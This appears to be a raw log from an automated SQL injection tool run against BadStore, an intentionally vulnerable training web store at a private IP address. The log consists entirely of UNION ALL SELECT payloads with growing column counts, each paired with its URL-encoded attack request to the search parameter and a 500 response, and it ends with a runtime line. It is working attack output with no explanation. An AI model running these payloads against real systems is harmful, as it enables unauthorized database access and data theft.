 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23&action=search&x=0&y=0
	500

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
	http://10.147.38.45/cgi-bin/badstore.cgi?searchquery=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23&action=search&x=0&y=0
	500

90 worked
[*] Runtime: 5.84438896179